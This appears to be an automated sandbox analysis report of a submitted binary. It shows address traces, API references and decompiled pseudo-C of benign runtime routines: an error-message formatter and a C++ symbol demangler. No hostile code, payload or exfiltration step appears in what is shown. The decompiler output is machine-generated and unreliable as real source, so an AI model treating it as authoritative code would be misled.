0x013d9ba1
0x013d9ba1
0x013d9ba3
0x013d9ba8
0x013d9bac
0x013d9bae
0x013d9bb0
0x013d9d80
0x013d9d84
0x013d9d84
0x013d9d87
0x013d9d89
0x013d9d8c
0x013d9d91
0x013d9d96
0x013d9d9a
0x013d9d9d
0x013d9d9f
0x013d9da1
0x013d9da6
0x013d9dab
0x013d9daf
0x00000000
0x013d9bb6
0x013d9bb6
0x013d9bb9
0x013d9bbb
0x013d9d30
0x013d9d34
0x013d9d38
0x013d9d3b
0x013d9d3f
0x013d9d41
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9bc1
0x013d9bc1
0x013d9cc8
0x013d9cc8
0x013d9ccc
0x013d9cd4
0x013d9cd6
0x00000000
0x013d9cdc
0x00000000
0x013d9cdc
0x013d9bc7
0x013d9bc7
0x013d9bc9
0x013d9cc0
0x013d9cc2
0x0147aa5d
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x00000000
0x00000000
0x00000000
0x013d9bcf
0x013d9bcf
0x013d9bd3
0x013d9bd7
0x013d9bda
0x013d9bde
0x013d9be0
0x013d9d47
0x013d9d47
0x013d9d4b
0x013d9d4d
0x013d9d4d
0x013d9d50
0x013d9d53
0x013d9d57
0x013d9d5a
0x013d9d5f
0x013d9d63
0x013d9d66
0x013d9d68
0x013d9d6a
0x013d9d6f
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9be0
0x013d9bc9
0x013d9bc1
0x013d9bbb
0x013d9bb0
0x013d9c35
0x013d9c35
0x013d9c35
0x013d9c37
0x013d9bf0
0x013d9bf0
0x013d9bf3
0x013d9bf6
0x013d9bf8
0x013d9bfc
0x013d9c00
0x013d9c02
0x00000000
0x013d9c04
0x013d9c08
0x013d9c0a
0x013d9c0c
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9c0c
0x013d9c39
0x013d9c39
0x013d9c39
0x013d9c3d
0x013d9c3f
0x013d9c3f
0x013d9c42
0x013d9c45
0x013d9c49
0x013d9c4c
0x013d9c51
0x013d9c55
0x013d9c58
0x013d9c5a
0x013d9c5c
0x013d9c61
0x013d9c66
0x013d9c68
0x013d9c6c
0x013d9c6e
0x00000000
0x013d9c70
0x013d9c70
0x013d9c70
0x013d9c75
0x013d9c78
0x013d9c7a
0x013d9d10
0x013d9c8f
0x013d9c93
0x013d9c95
0x00000000
0x00000000
0x013d9c80
0x013d9c80
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9c80
0x013d9c7a
0x013d9c6e
0x013d9c37
0x013d9c2f
0x00000000
0x013d9c25
0x013d9d20
0x013d9d23
0x013d9d23
0x013d9d25
0x013d9d26
0x013d9d27
0x013d9d28
0x013d9d29
0x013d9cad
0x013d9cad
0x013d9cad
0x013d9cb0
0x013d9cb2
0x013d9cb3
0x013d9cb4
0x013d9cb5
0x013d9cb6
0x013d9cb6
0x00000000
0x00000000
0x013d9ca7
0x013d9c82
0x013d9c82
0x013d9c82
0x00000000
0x013d9de2
0x00000000

APIs

abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 77bf33bc1d62e65765f1414ff75f10d13ec27e694a398a9128978616fa60b5de
Instruction ID: 28a2d050ad196f22c6e342ef87d1590903de4b0ffc70a29337ba18e7590110f6
Opcode Fuzzy Hash: 77bf33bc1d62e65765f1414ff75f10d13ec27e694a398a9128978616fa60b5de
Instruction Fuzzy Hash: 4DB09222C49229C4C820A96C01043BAE2A9975714CF89210B806B730458622E803171F

Uniqueness

Uniqueness Score: -1.00%

Function 013E8960 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130
windowCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E013E8960(long __ebx, intOrPtr* __ecx, long __edi, void* __esi, intOrPtr _a8) {
				void* _v16;
				void* _v32;
				intOrPtr _v52;
				char _v56;
				void** _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char _v116;
				char _v124;
				intOrPtr _v144;
				intOrPtr _v152;
				char _v156;
				long _t32;
				intOrPtr* _t38;
				intOrPtr _t39;
				char _t42;
				char _t44;
				void* _t45;
				intOrPtr* _t54;
				char _t56;
				intOrPtr _t57;
				char _t58;
				void* _t62;
				intOrPtr _t66;
				long _t67;
				char* _t70;
				void* _t74;
				intOrPtr* _t75;
				long _t77;
				void* _t78;
				void** _t80;
				void* _t82;
				intOrPtr* _t83;
				void** _t84;
				intOrPtr* _t87;
				intOrPtr* _t88;

				_t67 = __edi;
				_t78 = _t82;
				_t54 = __ecx;
				_t83 = _t82 - 0x3c;
				_v32 = 0;
				_v52 = 0;
				_v56 = 0;
				_v60 =  &_v32;
				_v64 = 0x400;
				_v72 = 0;
				_v68 = _a8;
				 *_t83 = 0x1100;
				_t32 = FormatMessageA(__ebx, __esi, __edi, _t77, ??, ??, ??);
				_t66 = _t54 + 8;
				_t84 = _t83 - 0x1c;
				if(_t32 == 0) {
					 *_t54 = _t66;
					_v72 = 0x14ac1c0;
					 *_t84 = "Unknown error code";
					E01462CC0(_t54);
					return _t54;
				} else {
					_t74 = _v32;
					if(_t32 > 3) {
						_t14 = _t32 - 3; // -3
						_t62 = _t14;
						_t67 = _t74 + _t62;
						if( *_t67 == 0xd2e) {
							_t32 =  ==  ? _t62 : _t32;
						}
					}
					 *_t54 = _t66;
					if(_t74 == 0) {
						 *_t84 = "basic_string: construction from null is not valid";
						_t56 = E014796C0(_t66, _t67);
						_v72 = _t56;
						E013D8C90(_t36, _t56, _t66, _t67, _t74);
						_t80 = _t84;
						_t87 = _t84 - 0x3c;
						_t57 = _v68;
						 *_t87 = 0x10;
						_t38 = E01477A00(_t57, _t74, _t56);
						_v144 = _t57;
						_t75 = _t38;
						_t39 =  *0x14a3a88; // 0x14b0b0c
						 *_t87 = 0x14a3a88;
						 *((intOrPtr*)(_t39 + 0x10))(_t74, _t67, _t78, LocalFree(_t74));
						_push(_t66);
						_t64 = _t75;
						_v156 =  &_v124;
						_t70 =  &_v116;
						_push(E01451B90(_t75, _t66));
						_t42 = _v124;
						if(_t42 != _t70) {
							_v156 = _t42;
							L01477910();
						}
						 *((intOrPtr*)(_t87 + 8)) = E01440A50;
						_v152 = 0x14adf40;
						_v156 = _t75;
						 *_t75 = 0x14b17cc;
						 *((intOrPtr*)(_t75 + 8)) = _t57;
						 *((intOrPtr*)(_t75 + 0xc)) = 0x14a3a88;
						_t58 = E01477F00(_t64, _t66, _t70, _t75, _t80);
						_t44 = _v56;
						if(_t44 != _t70) {
							_v156 = _t44;
							L01477910();
						}
						_t45 = E01477C80(_t75);
						_v156 = _t58;
						E013D8C90(_t45, _t58, _t66, _t70, _t75);
						_t88 = _t87 - 0x1c;
						 *_t88 = 0x1478750;
						E013C14A0();
						 *_t88 = 0x1478760;
						return E013C14A0();
					} else {
						 *_t84 = _t74;
						_v72 = _t74 + _t32;
						E01462CC0(_t54);
						 *(_t84 - 8) = _t74;
						LocalFree(??);
						return _t54;
					}
				}
			}

0x013e8960
0x013e8961
0x013e8969
0x013e896b
0x013e896e
0x013e8975
0x013e897d
0x013e8985
0x013e8989
0x013e8994
0x013e899c
0x013e89a0
0x013e89a7
0x013e89ad
0x013e89b0
0x013e89b5
0x013e8a10
0x013e8a14
0x013e8a1c
0x013e8a23
0x013e8a34
0x013e89b7
0x013e89b7
0x013e89bd
0x013e89f0
0x013e89f0
0x013e89f3
0x013e89fb
0x013e8a01
0x013e8a01
0x013e89fb
0x013e89bf
0x013e89c3
0x013e8a37
0x013e8a43
0x0147a836
0x0147a839
0x0147a841
0x0147a849
0x0147a84c
0x0147a84f
0x0147a856
0x0147a85b
0x0147a861
0x0147a863
0x0147a868
0x0147a86f
0x0147a872
0x0147a873
0x0147a876
0x0147a879
0x0147a881
0x0147a882
0x0147a887
0x0147a889
0x0147a88c
0x0147a88c
0x0147a891
0x0147a899
0x0147a8a1
0x0147a8a4
0x0147a8aa
0x0147a8ad
0x0147a8b9
0x0147a8bb
0x0147a8c0
0x0147a8c2
0x0147a8c5
0x0147a8c5
0x0147a8d1
0x0147a8d6
0x0147a8d9
0x0147a8e0
0x0147a8e3
0x0147a8ea
0x0147a8ef
0x0147a8fe
0x013e89c5
0x013e89c7
0x013e89cc
0x013e89d0
0x013e89d8
0x013e89db
0x013e89ed
0x013e89ed
0x013e89c3

APIs

FormatMessageA.KERNEL32 ref: 013E89A7
LocalFree.KERNEL32 ref: 013E89DB

Strings

basic_string: construction from null is not valid, xrefs: 013E8A37
Unknown error code, xrefs: 013E8A1C

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: ee2599b4e84db14a2917a155bc258401a9b00f458c4b38eebc7013db26708b38
Instruction ID: f4de0e3bced91c0e64b6884b63f5658c4addfa8b9e0b75d1f0641ff70456daed
Opcode Fuzzy Hash: ee2599b4e84db14a2917a155bc258401a9b00f458c4b38eebc7013db26708b38
Instruction Fuzzy Hash: 52418AB1A043119FDB10BF69D8886AEFBF4FF94704F41882EE48597224E7349449CB92

Uniqueness

Uniqueness Score: -1.00%

Function 013D4220 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E013D4220(signed int __eax, signed int __ecx, signed int __edx) {
				void* _v16;
				signed char _v32;
				signed int _v36;
				signed char _v40;
				char* _v44;
				signed int _v48;
				signed char _v52;
				char* _v56;
				signed char _v60;
				signed char _v64;
				signed char _v68;
				signed char _v72;
				signed char _v76;
				signed char _v80;
				signed char _v84;
				signed char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				char* _v104;
				char _v360;
				signed char _v364;
				signed char _v368;
				signed char _v372;
				signed char _v376;
				signed char _v380;
				signed char _v384;
				signed int _v388;
				signed char _v392;
				char* _v396;
				signed char _v400;
				signed char _v404;
				signed int _v408;
				signed char* _v412;
				signed char _v416;
				intOrPtr _v420;
				signed int _v424;
				signed int* _v432;
				signed char _v436;
				intOrPtr _v440;
				signed char _v444;
				signed int _v448;
				intOrPtr _v452;
				signed char* _v456;
				signed int _v460;
				intOrPtr _v464;
				char _v477;
				char _v480;
				intOrPtr _v484;
				char* _v488;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t192;
				void* _t198;
				signed int _t207;
				signed int _t208;
				signed int _t212;
				char* _t226;
				int _t229;
				signed int _t232;
				signed int _t236;
				signed int _t238;
				signed int _t240;
				signed int _t243;
				signed char* _t246;
				signed int _t247;
				signed int _t248;
				signed int _t251;
				signed char _t253;
				signed int _t258;
				signed int _t265;
				signed char _t266;
				signed char* _t267;
				signed int _t268;
				signed char _t270;
				signed int _t272;
				signed int _t274;
				signed int _t278;
				signed int _t279;
				signed int _t283;
				signed char _t287;
				signed char* _t297;
				signed char _t299;
				signed int _t309;
				signed int _t310;
				signed char _t313;
				signed char* _t314;
				signed char* _t315;
				signed int _t317;
				signed int _t319;
				void* _t320;
				void* _t321;
				signed int* _t322;
				signed char* _t325;

				_t283 = __edx;
				_t268 = __ecx;
				_t309 = __edx;
				_t265 = __eax;
				_t322 = _t321 - 0x1dc;
				_v460 = __ecx;
				if( *((char*)(__eax)) == 0x5f) {
					_v436 = 1;
					__eflags =  *((char*)(__eax + 1)) - 0x5a;
					if( *((char*)(__eax + 1)) != 0x5a) {
						goto L1;
					} else {
						goto L2;
					}
					goto L66;
				} else {
					L1:
					_v484 = 8;
					_v488 = "_GLOBAL_";
					 *_t322 = _t265;
					_t184 = strncmp(??, ??, ??);
					_v436 = 0;
					if(_t184 == 0) {
						_t185 =  *(_t265 + 8) & 0x000000ff;
						_t185 - 0x2e = _t185 - 0x5f;
						__eflags = _t283 & 0xffffff00 | _t185 == 0x0000005f | _t268 & 0xffffff00 | _t185 == 0x0000002e;
						if((_t283 & 0xffffff00 | _t185 == 0x0000005f | _t268 & 0xffffff00 | _t185 == 0x0000002e) != 0) {
							L46:
							_t186 =  *(_t265 + 9) & 0x000000ff;
							__eflags = _t186 - 0x44;
							if(_t186 == 0x44) {
								L48:
								_v436 = 0;
								__eflags =  *((char*)(_t265 + 0xa)) - 0x5f;
								if( *((char*)(_t265 + 0xa)) == 0x5f) {
									__eflags = _t186 - 0x49;
									_v436 = ((_t186 & 0xffffff00 | _t186 != 0x00000049) & 0x000000ff) + 2;
								}
								goto L2;
							} else {
								_v436 = 0;
								__eflags = _t186 - 0x49;
								if(_t186 != 0x49) {
									goto L2;
								} else {
									goto L48;
								}
							}
						} else {
							__eflags = _t185 - 0x24;
							if(_t185 != 0x24) {
								goto L2;
							} else {
								goto L46;
							}
						}
						L66:
					}
				}
				L2:
				_t270 = _v436;
				_v464 = _t309;
				_v368 = 1;
				_v452 = (0 | _t270 != 0x00000002) + 0x45;
				_v456 = _t265 + 1;
				_t13 = _t270 - 2; // -2
				_v440 = _t13;
				while(1) {
					 *_t322 = _t265;
					_t192 = strlen(??);
					_v424 = _t265;
					_v412 = _t265;
					_v420 = _t265 + _t192;
					_t287 = _t192 + _t192;
					_v416 = 0x11;
					_v400 = _t287;
					_v404 = 0;
					_v388 = _t192;
					_v392 = 0;
					_v384 = 0;
					_v380 = 0;
					_v376 = 0;
					_v372 = 0;
					_v364 = 0;
					if(_t287 > 0x800) {
						break;
					}
					_t310 = _t192 * 4;
					_v432 = _t322;
					_t198 = E013D6170(0xf + (_t192 + _t310) * 8 >> 4 << 4);
					_t61 = _t310 + 0xf; // 0x13cc80f
					_t317 =  &_v477;
					_t318 = _t317 & 0xfffffffc;
					_t272 = _t317 >> 2;
					_t325 = _t322 - _t198 - E013D6170(_t61 >> 4 << 4);
					_v408 = _t317 & 0xfffffffc;
					_v396 =  &_v480;
					if(_v436 != 1) {
						__eflags = _v440 - 1;
						if(__eflags > 0) {
							_t319 = E013CD020( &_v424, _t265, _t272, _t310, _t318, __eflags);
							_t207 =  *_v412 & 0x000000ff;
						} else {
							_t313 = _t265 + 0xb;
							__eflags =  *(_t265 + 0xb) - 0x5f;
							_v412 = _t313;
							if( *(_t265 + 0xb) != 0x5f) {
								L6:
								_v444 = _t287;
								_v448 = _t272;
								 *_t325 = _t313;
								_t229 = strlen(??);
								__eflags = _v444;
								if(_v444 == 0) {
									L52:
									_t318 = 0;
									_v444 =  &_v424;
								} else {
									_v404 = 1;
									_t278 = _v448;
									 *(4 + _t278 * 4) = 0;
									 *(8 + _t278 * 4) = 0;
									__eflags = _t229;
									if(_t229 == 0) {
										goto L52;
									} else {
										 *(0x10 + _t278 * 4) = _t229;
										 *(_t278 * 4) = 0;
										 *(0xc + _t278 * 4) = _t313;
										_v444 =  &_v424;
									}
								}
							} else {
								__eflags =  *((char*)(_t265 + 0xc)) - 0x5a;
								if( *((char*)(_t265 + 0xc)) == 0x5a) {
									_v412 = _t265 + 0xd;
									_t236 =  *(_t265 + 0xd) & 0x000000ff;
									__eflags = _t236 - 0x47;
									if(_t236 == 0x47) {
										L50:
										_v444 =  &_v424;
										_t238 = E013CF1A0( &_v424);
										_t313 = _v412;
										_t318 = _t238;
										goto L9;
									} else {
										__eflags = _t236 - 0x54;
										if(_t236 == 0x54) {
											goto L50;
										} else {
											_v444 =  &_v424;
											_t240 = E013CFC20( &_v424, _t272, 0);
											_t313 = _v412;
											_t318 = _t240;
											goto L9;
										}
									}
									goto L66;
								} else {
									goto L6;
								}
							}
							L9:
							 *_t325 = 0;
							_t232 = E013CC370(_v444, _t318, _v452);
							 *_t325 = _t313;
							_t319 = _t232;
							_t314 = _t313 + strlen(??);
							__eflags = _t314;
							_v412 = _t314;
							_t207 =  *_t314 & 0x000000ff;
						}
						goto L10;
					} else {
						if( *_t265 != 0x5f) {
							L12:
							__eflags = _v368 - 0xffffffff;
							if(_v368 != 0xffffffff) {
								_t208 = 0;
								__eflags = 0;
								goto L57;
							} else {
								_v368 = 0;
								_t322 = _v432;
								continue;
							}
						} else {
							_v412 = _v456;
							if( *((char*)(_t265 + 1)) != 0x5a) {
								goto L12;
							} else {
								_v412 = _t265 + 2;
								_t243 =  *(_t265 + 2) & 0x000000ff;
								if(_t243 == 0x47 || _t243 == 0x54) {
									_v444 =  &_v424;
									_t319 = E013CF1A0( &_v424);
								} else {
									_v444 =  &_v424;
									_t319 = E013CFC20( &_v424, _t272, 1);
								}
								_t246 = _v412;
								_t297 = _t246;
								_t207 =  *_t246 & 0x000000ff;
								if((_v416 & 0x00000001) != 0 && _t207 == 0x2e) {
									_v448 = _t265;
									_t315 = _t297;
									while(1) {
										_t247 = _t315[1] & 0x000000ff;
										_t81 = _t247 - 0x61; // -7
										_t299 = _t81 & 0xffffff00 | _t81 - 0x00000019 < 0x00000000;
										_t279 = _t272 & 0xffffff00 | _t247 == 0x0000005f;
										_t248 = _t247 - 0x30;
										if(_t299 != 0 || _t279 != 0) {
											goto L63;
										}
										L26:
										if(_t248 > 9) {
											_t265 = _v448;
											_t207 =  *_v412 & 0x000000ff;
										} else {
											L27:
											_t251 = _t315[2] & 0x000000ff;
											_t267 =  &(_t315[2]);
											while(1) {
												_t279 = _t279 & 0xffffff00 | _t251 - 0x00000061 - 0x00000019 < 0x00000000;
												if((_t251 - 0x00000030 & 0xffffff00 | _t251 - 0x00000030 - 0x00000009 < 0x00000000 | _t279) == 0 && _t251 != 0x5f) {
													break;
												}
												_t251 = _t267[1] & 0x000000ff;
												_t267 =  &(_t267[1]);
												__eflags = _t267;
											}
											L32:
											while(_t251 == 0x2e) {
												while((_t267[1] & 0x000000ff) - 0x30 <= 9) {
													_t251 = _t267[2] & 0x000000ff;
													_t267 =  &(_t267[2]);
													_t98 = _t251 - 0x30; // -47
													if(_t98 > 9) {
														goto L32;
													} else {
														do {
															_t258 = _t267[1] & 0x000000ff;
															_t267 =  &(_t267[1]);
														} while (_t258 - 0x30 <= 9);
														if(_t258 == 0x2e) {
															continue;
														}
													}
													goto L38;
												}
												break;
											}
											L38:
											_v412 = _t267;
											_t253 = E013CC480(_v444, _t267 - _t315, _t315);
											_t272 = _t319;
											 *_t325 = _t253;
											_t319 = E013CC370(_v444, _t272, 0x4f);
											_t207 =  *_t267 & 0x000000ff;
											if(_t207 != 0x2e) {
												_t265 = _v448;
											} else {
												_t315 = _t267;
												_t247 = _t315[1] & 0x000000ff;
												_t81 = _t247 - 0x61; // -7
												_t299 = _t81 & 0xffffff00 | _t81 - 0x00000019 < 0x00000000;
												_t279 = _t272 & 0xffffff00 | _t247 == 0x0000005f;
												_t248 = _t247 - 0x30;
												if(_t299 != 0 || _t279 != 0) {
													goto L63;
												}
											}
										}
										goto L10;
										L63:
										_t248 - 9 = _t248 & 0xffffff00 | _t248 - 0x00000009 < 0x00000000 | _t299;
										if((_t248 & 0xffffff00 | _t248 - 0x00000009 < 0x00000000 | _t299) != 0) {
											goto L27;
										} else {
											__eflags = _t279;
											if(_t279 != 0) {
												goto L27;
											} else {
												_t251 =  *_t315 & 0x000000ff;
												_t267 = _t315;
											}
										}
										goto L32;
									}
								}
								L10:
								__eflags = _t319;
								if(_t319 == 0) {
									goto L12;
								} else {
									__eflags = _t207;
									if(_t207 == 0) {
										_t266 =  &_v360;
										_v104 = 0;
										_v92 = _v460;
										_v100 = 0;
										_v88 = 0;
										_v84 = 0;
										_v68 = 0;
										_v64 = 0;
										_v96 = _v464;
										_v80 = 0;
										_v76 = 0;
										_v72 = 0;
										_v60 = 0;
										_v52 = 0;
										_v48 = 0;
										_v40 = 0;
										_v36 = 0;
										E013CC6E0(_t266, _t319);
										__eflags = _v76 - 0x7ff;
										if(_v76 <= 0x7ff) {
											_v76 = 0;
										}
										_t212 = _v48;
										_v32 = 0;
										_t274 = _v36 * _t212;
										__eflags = _t212;
										_t213 =  <=  ? 1 : _t212;
										_v36 = _t274;
										E013D6170(0xf + ( <=  ? 1 : _t212) * 8 >> 4 << 4);
										__eflags = _t274;
										_t275 =  <=  ? 1 : _t274;
										E013D6170(0xf + ( <=  ? 1 : _t274) * 8 >> 4 << 4);
										_v56 =  &_v480;
										_v44 =  &_v480;
										E013D2E50(_t266, _t319);
										_t226 = _v104;
										 *((char*)(_t320 + _t226 - 0x164)) = 0;
										_v484 = _v92;
										_v488 = _t226;
										 *_t325 = _t266;
										_v96();
										__eflags = _v80;
										_t208 = 0 | _v80 == 0x00000000;
										L57:
										return _t208;
									} else {
										goto L12;
									}
								}
							}
						}
					}
					goto L66;
				}
				__eflags = 0;
				return 0;
				goto L66;
			}

0x013d4220
0x013d4220
0x013d4224
0x013d4228
0x013d422a
0x013d4233
0x013d4239
0x013d46e3
0x013d46ed
0x013d46f1
0x00000000
0x013d46f7
0x00000000
0x013d46f7
0x00000000
0x013d423f
0x013d423f
0x013d423f
0x013d4247
0x013d424f
0x013d4252
0x013d4257
0x013d4263
0x013d463c
0x013d4645
0x013d464a
0x013d464c
0x013d4656
0x013d4656
0x013d465a
0x013d465c
0x013d4670
0x013d4670
0x013d467a
0x013d467e
0x013d4684
0x013d468f
0x013d468f
0x00000000
0x013d465e
0x013d465e
0x013d4668
0x013d466a
0x00000000
0x00000000
0x00000000
0x00000000
0x013d466a
0x013d464e
0x013d464e
0x013d4650
0x00000000
0x00000000
0x00000000
0x00000000
0x013d4650
0x00000000
0x013d464c
0x013d4263
0x013d4269
0x013d4269
0x013d4271
0x013d4277
0x013d428a
0x013d4293
0x013d4299
0x013d429c
0x013d43a3
0x013d43a3
0x013d43a6
0x013d43ab
0x013d43b4
0x013d43ba
0x013d43c0
0x013d43c3
0x013d43cd
0x013d43d3
0x013d43dd
0x013d43e3
0x013d43ed
0x013d43f7
0x013d4401
0x013d440b
0x013d4415
0x013d4425
0x00000000
0x00000000
0x013d442b
0x013d4432
0x013d4447
0x013d444e
0x013d4451
0x013d445d
0x013d4460
0x013d4468
0x013d4471
0x013d447b
0x013d4481
0x013d42b0
0x013d42b7
0x013d45f3
0x013d45fb
0x013d42bd
0x013d42bd
0x013d42c0
0x013d42c4
0x013d42ca
0x013d42d6
0x013d42d6
0x013d42dc
0x013d42e2
0x013d42e5
0x013d42f0
0x013d42f2
0x013d46d0
0x013d46d6
0x013d46d8
0x013d42f8
0x013d42f8
0x013d4302
0x013d4308
0x013d4313
0x013d431e
0x013d4320
0x00000000
0x013d4326
0x013d4326
0x013d4333
0x013d433e
0x013d4345
0x013d4345
0x013d4320
0x013d42cc
0x013d42cc
0x013d42d0
0x013d4606
0x013d460c
0x013d4610
0x013d4612
0x013d469a
0x013d46a0
0x013d46a6
0x013d46ab
0x013d46b1
0x00000000
0x013d4618
0x013d4618
0x013d461a
0x00000000
0x013d461c
0x013d4624
0x013d462a
0x013d462f
0x013d4635
0x00000000
0x013d4635
0x013d461a
0x00000000
0x00000000
0x00000000
0x00000000
0x013d42d0
0x013d434b
0x013d434b
0x013d4360
0x013d4365
0x013d4368
0x013d436f
0x013d436f
0x013d4371
0x013d4377
0x013d4377
0x00000000
0x013d4487
0x013d448a
0x013d4386
0x013d4386
0x013d438d
0x013d4706
0x013d4706
0x00000000
0x013d4393
0x013d4393
0x013d439d
0x00000000
0x013d439d
0x013d4490
0x013d449a
0x013d44a0
0x00000000
0x013d44a6
0x013d44a9
0x013d44af
0x013d44b5
0x013d46be
0x013d46c9
0x013d44c3
0x013d44ce
0x013d44d9
0x013d44d9
0x013d44db
0x013d44e1
0x013d44e3
0x013d44ed
0x013d44fb
0x013d4501
0x013d4508
0x013d4508
0x013d450c
0x013d4512
0x013d4517
0x013d451a
0x013d451f
0x00000000
0x00000000
0x013d452d
0x013d452f
0x013d4851
0x013d4857
0x013d4535
0x013d4535
0x013d4535
0x013d4539
0x013d4547
0x013d4550
0x013d455b
0x00000000
0x00000000
0x013d4540
0x013d4544
0x013d4544
0x013d4544
0x00000000
0x013d4568
0x013d456c
0x013d4577
0x013d457e
0x013d4580
0x013d4586
0x00000000
0x013d4590
0x013d4590
0x013d4590
0x013d4594
0x013d459a
0x013d45a1
0x00000000
0x00000000
0x013d45a1
0x00000000
0x013d4586
0x00000000
0x013d456c
0x013d45a3
0x013d45a7
0x013d45b7
0x013d45bc
0x013d45c3
0x013d45cd
0x013d45cf
0x013d45d4
0x013d4840
0x013d45da
0x013d45da
0x013d4508
0x013d450c
0x013d4512
0x013d4517
0x013d451a
0x013d451f
0x00000000
0x00000000
0x013d451f
0x013d45d4
0x00000000
0x013d485f
0x013d4864
0x013d4866
0x00000000
0x013d486c
0x013d486c
0x013d486e
0x00000000
0x013d4874
0x013d4874
0x013d4877
0x013d4877
0x013d486e
0x00000000
0x013d4866
0x013d4508
0x013d437a
0x013d437a
0x013d437c
0x00000000
0x013d437e
0x013d437e
0x013d4380
0x013d4722
0x013d472a
0x013d4731
0x013d4736
0x013d473a
0x013d4741
0x013d4748
0x013d474f
0x013d4756
0x013d4759
0x013d4760
0x013d4767
0x013d476e
0x013d4775
0x013d477c
0x013d4783
0x013d478a
0x013d4791
0x013d4796
0x013d479d
0x013d479f
0x013d479f
0x013d47a6
0x013d47b3
0x013d47ba
0x013d47bd
0x013d47bf
0x013d47c9
0x013d47d2
0x013d47d9
0x013d47e0
0x013d47f4
0x013d47fb
0x013d4809
0x013d480e
0x013d4813
0x013d481b
0x013d4823
0x013d4827
0x013d482b
0x013d482e
0x013d4836
0x013d4838
0x013d4708
0x013d4715
0x00000000
0x00000000
0x00000000
0x013d4380
0x013d437c
0x013d44a0
0x013d448a
0x00000000
0x013d4481
0x013d46ff
0x013d4705
0x00000000

APIs

strncmp.MSVCRT ref: 013D4252
strlen.MSVCRT ref: 013D43A6

Strings

_GLOBAL_, xrefs: 013D4247

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
